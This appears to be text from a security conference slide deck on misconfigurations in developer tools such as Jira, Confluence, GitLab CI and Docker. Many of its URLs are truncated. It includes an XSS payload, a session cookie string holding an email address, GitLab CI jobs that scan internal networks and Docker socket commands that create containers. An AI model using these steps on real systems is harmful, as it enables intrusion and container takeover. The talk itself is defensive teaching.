MISCONFIGURATION IN THE DEVELOPER INFRASTRUCTURE
MOROZOV ALEXEY, Security myth destroyer

What is Misconfiguration?
1) Logical bugs let through by developer negligence (comments left in code, hardcoded credentials, test functionality)
2) Incorrectly configured hardware or infrastructure services
3) Insufficient control of access rights
4) Nobody knows for sure

Application solutions:
• Task management systems: Jira, Redmine, Scrum boards and the like
• Continuous integration systems: TeamCity, GitLab CI, Jenkins
• Bugtracking systems
• Containers: docker/lxc
• Wiki systems
• Monitoring and control systems
Task Manager systems
• Jira
• Confluence
• Redmine
• Agile boards
• IDE extensions
• … other
Jira Vulnerabilities
• Stack trace: https://jira.
• Agile board: https://jira.
• https://
• Blind JQL: https://
• https://
Confluence
• StackTrace: https://confluence.
• https://confluence.ru/rest/api/space
• https://confluence.ru/rest/api/content/
• https://confluence.ru/rest/api/space/{SPACEKEY}
• https://confluence.ru/rest/api/content/{ContentI}
Reading open spaces
Blind CQL: api/content/search?cql=space.title~"s.*"
Redmine
Redmine – XSS: !l(“ onerror=alert(/1/))!
Redmine – basic.Php

Worksection – broken auth

Asana – broken session
soft_signup_user_id=5166376; soft_signup_email=hac126%40mail.ru; xi_ip=97.12.23.123; soft_signup_invitation_token=numeric_token-5166375-672796; gtm_u_id=5166376; dapulseUserId=5166375; gtm_u_is_admin=true; gtm_a_paying_value=0.0;
HiTask
• HiTask – XSS
• HiTask – LFI

TFS

TeamCity – guest

DOCKER/LXD API
docker run -v /var/run/docker.sock:/var/run/docker.sock debian ls
curl --unix-socket /var/run/docker.sock http://
{ "type": "async", "status": "Operation created", "status_code": 100, "metadata": { "id": "439bf4a1-e056-4b76-86ad-bff06169fce1", "class": "task", "created_at": "2016-04-18T22:56:22.590239576
GIT-LAB
• Intercept source code
• API
• Enumeration keys
• https://gitlab.rambler.ru/al.morozov.keys

GIT-LAB
1) Create a file named .gitlab-ci.yml to scan the internal network:
job1:
  script:
    - ifconfig
2) Scan port 2375

GIT-LAB
job1:
  script:
    - nmap 10.234.0.3/16 -P0 -p 2375 -n --open --min-rate=300

GIT-LAB
job1:
  script:
    - ip addr
    - ps aux
    - curl -s --unix-socket /var/run/docker.sock http:/containers/json

GIT-LAB
curl -s --unix-socket /var/run/docker.sock "http:/containers/create?name=72701f424a15661108227ea65a0548dbcbf6f5343207b050431980b71af7f7ec" -X POST -H "Content-Type: application/json" -d '{"Cmd": [ "ls", "-la", "./" ]}'

GitLab (API) – snippets
• https://gitlab.test.ru/explore/snippets
• https://gitlab/snippets/648

GitLab (API) – projects
1) https://gitlab/api/v4/projects
2) wfuzz -c -z range,1-10000 --sc=200 https://gitlab/api/v4/projects/FUZZ

GitLab (API) – users
• https://gitlab/api/v4/users/
• https://gitlab/api/v4/users/2
• https://
Sentry
Salt – Auth Bypass API (0-day) CVE-2018-15751
curl -si POST https://
curl -isi -H POST 'X-Auth-Token: https://
ARM sniffer
Given: a device within the network and access to it.
Task: sniff traffic from this device.
Restrictions: can't upload a file; 1 MB disk size; not root.
ARM sniffer: mount root_fs_arm.ext2
IPAM
curl https://
+ 3 BONUS KEYS
Rambler – Broken Access Control
Antichat – Similar threads
VoiceCards – Free calls
Thank you for your attention